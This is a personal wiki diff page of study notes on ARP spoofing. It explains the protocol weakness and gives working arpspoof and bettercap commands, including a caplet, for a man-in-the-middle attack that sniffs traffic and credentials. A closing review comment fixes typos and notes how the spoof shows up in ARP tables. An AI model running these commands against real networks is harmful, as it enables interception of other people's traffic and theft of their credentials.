The gMan nixWiki

Because the mind is made of Teflon...

hack_postconnect_arpspoofing

Differences

This shows you the differences between two versions of the page.

hack_postconnect_arpspoofing [2020/05/31 17:50] gmanhack_postconnect_arpspoofing [2020/05/31 18:11] (current) – [Bettercap ARP Spoof] gman
Line 4: Line 4:
  
 Test site: http://testphp.vulnweb.com/ Test site: http://testphp.vulnweb.com/
 +
 +===== ARP Tables =====
 +
 +To check ARP Tables in Windows or Linux: ``arp -a``
 +
 +If you get too many entries, grep it: 
 +
 +<code>arp -a | grep ether</code>
 +
 +----
 +
 +===== ARP Spoofing Attack =====
 +
 +**Terms:**
 +  * __ARP__: Address Resolution Protocol (maps IP to MAC on a network)
 +  * __ARP Request__: broadcast to the network requesting MAC of specific IP
 +  * __ARP Response__: client with that IP responds to requester with its MAC address
 +
 +Each computer on the network has an ARP table linking IPs with MACs. You use this table to exploit the ARP protocol and set up a MITM spoof.
 +  - You spoof the IP/MAC of the router: sent to victim. Causes the victim to update its ARP table and accociate my MAC with router's IP
 +  - You spoof the IP/MAC of the victim: sent to router. Causes the router to update its ARP table and associate my MAC with victim's IP
 +
 +This effectively puts you in the middle, intercepting traffic between victim and router. The victim thinks you are the router; and the router thinks you are the victim. 
 +
 +**Why ARP Spoofing works:** Because the protocol itself is not secure...
 +  - Clients accept responses even if they did not send a request.
 +  - Cients trust responses without any verification.
 +
 +So we send an ARP Response to a target and that target will not verify the response. The target will simply update its ARP table with the response I sent it. 
 +
 +**Tools:** arpspoof, bettercap
 +  * These tools only set up the ARP Spoof and redirect traffic to your computer (the put you as the Man in the Middle).
 +  * After you set this up, you need to capture and anylize the traffic (with something like Wireshark). 
 +
 +----
 +
 +===== arpspoof =====
 +
 +Syntax (usage is always the same): 
 +
 +<code>
 +arpspoof -i [interface] -t [clientIP] [gatewayIP]  # spoofs the client, telling him I am the gateway
 +arpspoof -i [interface] -t [gatewayIP] [clientIP]  # spoofs the gateway, telling him I am the client
 +</code>
 +
 +Example (as root): 
 +
 +<code>
 +arpspoof -i eth0 -t 192.168.0.216 192.168.0.1
 +arpspoof -i eth0 -t 192.168.0.1 192.168.0.216
 +</code>
 +
 +NOTE: You need to enable port forwarding to allow packets to flow through your machine just like a router.
 +  * As root: ''echo 1 > /proc/sys/net/ipv4/ip_forward''
 +
 +----
 +
 +===== Bettercap =====
 +
 +Bettercap can do the same thing as arpspoof and more: [[https://www.bettercap.org/modules/ethernet/|docs]].
 +
 +Bettercap is a framework to run network attacks: 
 +  * ARP Spoofing (redirect flow of packets through your machine to analyze, change)
 +  * Sniff data (urls, usernames, passwords)
 +  * Bypass HTTPS
 +  * DNS Spoofing (redirect domain requests)
 +  * Inject code in loaded pages
 +
 +**Syntax:** ''bettercap -iface [interface]''
 +
 +That gets in you into the tool. Type ''help'' to see a menu and the ''help [moduleName]'' to get help on a specific module name you want to use.
 +  * At the top of the help information you get syntax to turn on/off, etc.
 +  * Under that you get Parameters (options for the module). To change: 
 +    * Syntax: ''set [option to modify] [true | false]''
 +    * Example: ''set arp.spoof.fullduplex true''
 +
 +**Module: net.probe** (discover connected clients quickly)
 +  * Turn the module on (at bettercap prompt): ''net.probe on''
 +  * This will also automatically start the net.recon module (type "help" at prompt to confirm)
 +
 +**Module: net.recon**
 +  * net.probe sends probe requests to all possible IPs on the network
 +  * net.recon monitors ARP cache to take the responses and add them to a list for me to target
 +  * net.recon has several commands: 
 +    * net.show: Show cache hosts list (default sorting by ip).
 +
 +----
 +
 +===== Bettercap ARP Spoof =====
 +
 +Module: arp.spoof (for use, at bettercap prompt: "help arp.spoof")
 +  * You MUST have net.probe and net.recon running for this to work.
 +
 +1. Turn on net.probe if it's not on already
 +
 +<code>net.probe on</code>
 +
 +2. Change module parameter for full duplex (spoof client and router, both):
 +
 +<code>set arp.spoof.fullduplex true</code>
 +
 +3. Change module parameter to add your target client IP (because we set the full-duplex parameter, we do not have to set the gateway, only the client; the gateway/router sets automagically): 
 +
 +<code>
 +set arp.spoof.targets [target IP]
 +# or
 +set arp.spoof.targets [target IP],[target IP],[target IP]
 +</code>
 +
 +4. Turn ARP spoofing on (see "help arp.spoof") and that's it.
 +
 +<code>
 +arp.spoof on
 +help #to see the modules running
 +</code>
 +
 +NOTE: If you check our arp table in the client you will see the attach machine's MAC associated with the gateway.
 +
 +5. To sniff the traffic (still using bettercap; later we'll use Wireshark):
 +
 +<code>
 +help net.sniff # see the options
 +net.sniff on
 +</code>
 +
 +**Test It:** [[http://testphp.vulnweb.com/|VulnWeb]] (to generate some traffic)
 +
 +----
 +
 +===== Bettercap Caplets =====
 +
 +Caplets are custom scripts for Bettercap (basically text files with commands, one on each line). 
 +
 +How-To:
 +  - Create a text file
 +  - On each line put the commands you always run: 
 +
 +Example (to do all the above when you start Bettercap): 
 +
 +<code>
 +net.probe on
 +set arp.spoof.fullduplex true
 +set arp.spoof.targets 10.0.0.142
 +arp.spooof on
 +net.sniff on
 +</code>
 +
 +To run it: 
 +
 +<code>bettercap -iface [interface name] -caplet /path/to/caplet.cap</code>
 +
 +----
 +
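Review bot: the caplet example under "Bettercap Caplets" has a typo, `arp.spooof on`, so the caplet as written would never turn ARP spoofing on; it should read `arp.spoof on`, matching step 4 of the "Bettercap ARP Spoof" section. Two wording slips in the same hunk: the NOTE under "arpspoof" enables IP forwarding, not "port forwarding" (the sysctl written is `/proc/sys/net/ipv4/ip_forward`), and the NOTE after step 4 should read "check your ARP table in the client ... the attack machine's MAC", not "our" and "attach". Spelling: "accociate" should be "associate", "Cients" should be "Clients", "anylize" should be "analyze". That NOTE after step 4 is also the observable a defender would key on, since the page itself states that the victim's ARP table ends up with the attack machine's MAC against the gateway IP: a gateway entry whose MAC changes, or one MAC showing up for two IPs in the `arp -a` output from the "ARP Tables" section, is exactly what this spoof produces, so the section could say that comparing `arp -a` against the gateway's known MAC is how you spot it.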
 +
hack_postconnect_arpspoofing.1590947449.txt.gz · Last modified: by gman